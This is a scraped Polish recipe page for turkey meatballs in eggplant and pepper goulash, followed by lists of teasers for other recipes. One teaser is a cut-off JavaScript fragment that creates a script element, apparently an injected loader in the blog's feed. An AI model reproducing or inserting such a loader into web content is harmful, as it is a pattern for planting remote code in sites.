Pulpety z indyka w gulaszu z bakłażanem i papryką
Źródło: https://wesolakuchnia.blogspot.com/2019/01/pulpety-z-indyka-w-gulaszu-z-bakazanem.html
pulpety:30 dkg mielonego1 jajko2 lyzki kaszki mannysol, pieprz1 lyzeczka majerankumaka pszenna do obtoczenia1 cebula1 zabek czosnkugulasz:500 ml passaty pomidorowej1 baklazan1 cebula1 papryka czerwona30 dkg pieczareksol, pieprzpapryka wedzona, papryczka chili70 g serka fromage czosnkowynatka pietruszkiolej rzepakowyPulpety:Mieso mielone przekladam do miski, dodaje jajko, sol, pieprz, kaszke manne,...
Najnowsze przepisy
Poznaj rybę po grecku z fantastycznie dobranymi warzywami... ⇖ 24
Dzisiaj krótko i do rzeczy.To już kolejny piernik na moim... ⇖ 16
Łaciatek z makiem to ciasto, które przyciąga wzrok już... ⇖ 20
Ciasto jest wyśmienite, wielowarstwowe począwszy od... ⇖ 27
(function(){ u7xb=document.createElement("script");u7xb.type ⇖ 20
Rurki z kremem Kinder to przepis, który smakiem przenosi... ⇖ 15
Przepisy z bloga
Wiosenny pasztet z jajek z groszkiem będzie królował w... ⇖ 992
Chińskie bułeczki bao buns puszyste, leciutkie. Zrobiłam... ⇖ 616
Obiad który zrobimy w 40 minut. Dorsz w sosie pomidorowym... ⇖ 820
Polędwicę przygotujecie bardzo szybko. Wystarczy tylko... ⇖ 669
Torcik z mango curd i żelką malinową na biszkopcie na... ⇖ 1859
Orientalne smaki którym się nie oprzecie.Łosoś i dorsz... ⇖ 602
Receptura powstała na zasadzie co zrobić coś dobrego i... ⇖ 568
Kremowy pyszny serniczek z piernikami, orzechami i... ⇖ 548
Ryba po grecku ale w trochę innej formie podania bo... ⇖ 576
Przepisy na czasie
Prosty przepis na klasyczny drożdżowy makowiec. Przepis... ⇖ 2729
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 2099
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1447
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 845
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 749
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 679
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 646
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 641









































